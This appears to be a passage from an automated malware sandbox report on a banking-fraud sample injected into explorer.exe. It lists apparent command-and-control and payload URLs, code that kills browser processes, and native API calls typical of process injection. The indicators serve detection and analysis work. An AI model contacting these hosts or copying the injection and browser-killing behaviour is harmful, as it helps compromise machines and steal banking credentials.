00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4537635408.000001CEB01E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318826583.000001CEAE494000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE422000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE421000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617CE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190080056.0000027617D55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E193000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219328549.000002339E1F5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219239496.000002339E1FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: rundll32.exe, 00000004.00000003.3189915163.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536958246.0000027617D52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421623053.0000027617D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lew
Source: explorer.exe, 00000008.00000002.4553248554.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2325776934.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000008.00000000.2321862445.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000008.00000002.4549635767.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000008.00000000.2321862445.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4544441283.0000000007637000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000008.00000000.2321008105.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4540619614.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3095470555.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3857371736.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554853307.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dogirafer.com/
Source: explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dogirafer.com/.5
Source: explorer.exe, 00000008.00000002.4553248554.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dogirafer.com/3405117-2476756634-1003
Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dogirafer.com/Z#q
Source: explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dogirafer.com/eo
Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dogirafer.com/m
Source: explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3201304277.00000000030C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4538744172.00000000031FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dogirafer.com/test/
Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dogirafer.com/test/E
Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dogirafer.com/test/N#e
Source: explorer.exe, 00000008.00000002.4554024065.000000000C81C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dogirafer.com/test/a
Source: explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dogirafer.com/test/ys
Source: explorer.exe, 00000008.00000002.4554444765.000000000C8DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://dogirafer.com/uo
Source: explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103191493.0000000009BB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3103624134.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3100576777.0000000009B8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://huanvn.com/
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://huanvn.com/P
Source: rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://huanvn.com/Q
Source: rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://huanvn.com/~C
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421807994.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617CDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://huanvn.com:6542/gop.php
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE3A8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://huanvn.com:6542/gop.php5
Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://huanvn.com:6542/gop.php6)
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE41C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://huanvn.com:6542/gop.phpK
Source: rundll32.exe, 00000004.00000002.4536038404.0000027617C68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://huanvn.com:6542/gop.phpn)?
Source: rundll32.exe, 00000006.00000002.4535937784.000002339E18D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4535937784.000002339E11E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://huanvn.com:6542/stop.php
Source: explorer.exe, 00000008.00000003.3861913197.0000000009C93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4550686972.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3101269732.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3100576777.0000000009B8F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009C93000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000008.00000000.2325776934.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4553248554.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C912000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/files/stkm.bin
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C912000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/files/stkm.binSL
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4554444765.000000000C930000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/files/stkm.bino
Source: explorer.exe, 00000008.00000002.4555029441.000000000CA51000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/p
Source: explorer.exe, 00000008.00000002.4549635767.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/q
Source: explorer.exe, 00000008.00000003.3864470409.0000000003534000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.4555029441.000000000C9F9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/test/
Source: explorer.exe, 00000008.00000003.3362838683.00000000089B0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/test/1303063_94378682313560_2056837URLS1https://dogirafer.com/test/4190877_54
Source: explorer.exe, 00000008.00000003.3445364549.0000000008980000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/test/3630449_22862766669148_5703346URLS1https://dogirafer.com/test/6092916_19
Source: explorer.exe, 00000008.00000003.3201304277.00000000030C0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/test/4439042_94940942440575_5318539URLS1https://dogirafer.com/test/3185439_50
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/test/4560
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/test/4560D
Source: explorer.exe, 00000008.00000003.3414819462.00000000088C0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/test/9362058_57969102112118_633157URLS1https://dogirafer.com/test/8477611_767
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/test/X
Source: explorer.exe, 00000008.00000003.3857221025.000000000C90B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3863553988.000000000C92E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3855885147.000000000C908000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/test/t60G
Source: explorer.exe, 00000008.00000003.3863706304.0000000003532000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3864470409.0000000003534000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://reateberam.com/test/w
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3219518856.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.4536479202.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vutarf.com/
Source: rundll32.exe, 00000004.00000002.4536842943.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3190119329.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vutarf.com/%
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vutarf.com/W
Source: rundll32.exe, 00000006.00000003.2511990228.000002339E1CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vutarf.com:6542/gop.php
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2421653008.0000027617D1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vutarf.com:6542/stop.php
Source: rundll32.exe, 00000004.00000003.2421653008.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.4536296761.0000027617D0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vutarf.com:6542/stop.phpo
Source: rundll32.exe, 00000003.00000002.4535814161.000001CEAE474000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2318890532.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.3190095879.000001CEAE459000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://vutarf.com:6542/stop.phpu
Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000008.00000002.4549635767.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094423766.00000000099B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2323476795.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3856101577.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49941 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:49950 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:49972 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.217.190:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.68.89:443 -> 192.168.2.5:50029 version: TLS 1.2

E-Banking Fraud

Source: C:\Windows\explorer.exe Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, chrome.exe 8_2_0E454948
Source: C:\Windows\explorer.exe Code function: CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle, iexplore.exe 8_2_0E454948
Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
Source: C:\Windows\System32\rundll32.exe Code function: 3_3_000001CEAFE2D2B6 NtAllocateVirtualMemory, 3_3_000001CEAFE2D2B6
Source: C:\Windows\System32\rundll32.exe Code function: 3_3_000001CEAFE2D326 NtProtectVirtualMemory, 3_3_000001CEAFE2D326
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFCA4BE0 NtProtectVirtualMemory, 3_2_000001CEAFCA4BE0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFCA4FF0 NtQueueApcThread, 3_2_000001CEAFCA4FF0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFC717B0 NtClose,NtClose, 3_2_000001CEAFC717B0
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFCA4360 NtCreateThreadEx, 3_2_000001CEAFCA4360
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFCA4740 NtFreeVirtualMemory, 3_2_000001CEAFCA4740
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFCA3F40 NtAllocateVirtualMemory, 3_2_000001CEAFCA3F40
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFC87A50 NtSetContextThread, 3_2_000001CEAFC87A50
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFC71600 NtClose,RtlExitUserThread, 3_2_000001CEAFC71600
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_000001CEAFC88149 NtSetContextThread, 3_2_000001CEAFC88149
Source: C:\Windows\System32\rundll32.exe Code function: 4_3_00000276197BD326 NtProtectVirtualMemory, 4_3_00000276197BD326
Source: C:\Windows\System32\rundll32.exe Code function: 4_3_00000276197BD2B6 NtAllocateVirtualMemory, 4_3_00000276197BD2B6
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000276196271B0 NtClose, 4_2_00000276196271B0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619638149 NtSetContextThread, 4_2_0000027619638149
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619654BE0 NtProtectVirtualMemory, 4_2_0000027619654BE0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619654FF0 NtQueueApcThread, 4_2_0000027619654FF0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_00000276196217B0 NtClose,NtClose, 4_2_00000276196217B0
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619654360 NtCreateThreadEx, 4_2_0000027619654360
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619653F40 NtAllocateVirtualMemory, 4_2_0000027619653F40
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619654740 NtFreeVirtualMemory, 4_2_0000027619654740
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619621600 NtClose,RtlExitUserThread, 4_2_0000027619621600
Source: C:\Windows\System32\rundll32.exe Code function: 4_2_0000027619637A50 NtSetContextThread, 4_2_0000027619637A50
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000002339FC7D2B6 NtAllocateVirtualMemory, 6_3_000002339FC7D2B6
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000002339FC7D326 NtProtectVirtualMemory, 6_3_000002339FC7D326
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FBB4360 NtCreateThreadEx, 6_2_000002339FBB4360
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FB817B0 NtClose,NtClose, 6_2_000002339FB817B0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FBB3F40 NtAllocateVirtualMemory, 6_2_000002339FBB3F40
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FBB4740 NtFreeVirtualMemory, 6_2_000002339FBB4740
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FB81600 NtClose,RtlExitUserThread, 6_2_000002339FB81600
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FB97A50 NtSetContextThread, 6_2_000002339FB97A50
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FB98149 NtSetContextThread, 6_2_000002339FB98149
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FBB4FF0 NtQueueApcThread, 6_2_000002339FBB4FF0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000002339FBB4BE0 NtProtectVirtualMemory, 6_2_000002339FBB4BE0
Source: C:\Windows\explorer.exe Code function: 8_2_0303C704 NtDelayExecution, 8_2_0303C704
Source: C:\Windows\explorer.exe Code function: 8_2_0303B388 NtAllocateVirtualMemory, 8_2_0303B388
Source: C:\Windows\explorer.exe Code function: 8_2_030382B4 NtFreeVirtualMemory, 8_2_030382B4
Source: C:\Windows\explorer.exe Code function: 8_2_030401A0 NtFreeVirtualMemory, 8_2_030401A0
Source: C:\Windows\explorer.exe Code function: 8_2_030381C8 NtWriteFile, 8_2_030381C8
Source: C:\Windows\explorer.exe Code function: 8_2_03038240 NtClose, 8_2_03038240
Source: C:\Windows\explorer.exe Code function: 8_2_030380B8 RtlInitUnicodeString,NtCreateFile, 8_2_030380B8
Source: C:\Windows\explorer.exe Code function: 8_2_083882B4 NtFreeVirtualMemory, 8_2_083882B4
Source: C:\Windows\explorer.exe Code function: 8_2_0838B388 NtAllocateVirtualMemory, 8_2_0838B388
Source: C:\Windows\explorer.exe Code function: 8_2_08388240 NtClose, 8_2_08388240
Source: C:\Windows\explorer.exe Code function: 8_2_083880B8 RtlInitUnicodeString,NtCreateFile, 8_2_083880B8
Source: C:\Windows\explorer.exe Code function: 8_2_0838C704 NtDelayExecution, 8_2_0838C704
Source: C:\Windows\explorer.exe Code function: 8_2_083901A0 NtFreeVirtualMemory, 8_2_083901A0
Source: C:\Windows\explorer.exe Code function: 8_2_083881C8 NtWriteFile, 8_2_083881C8
Source: C:\Windows\explorer.exe Code function: 8_2_088582B4 NtFreeVirtualMemory, 8_2_088582B4
Source: C:\Windows\explorer.exe Code function: 8_2_0885B388 NtAllocateVirtualMemory, 8_2_0885B388
Source: C:\Windows\explorer.exe Code function: 8_2_088580B8 RtlInitUnicodeString,NtCreateFile, 8_2_088580B8
Source: C:\Windows\explorer.exe Code function: 8_2_08858240 NtClose, 8_2_08858240
Source: C:\Windows\explorer.exe Code function: 8_2_088601A0 NtFreeVirtualMemory, 8_2_088601A0
Source: C:\Windows\explorer.exe Code function: 8_2_088581C8 NtWriteFile, 8_2_088581C8
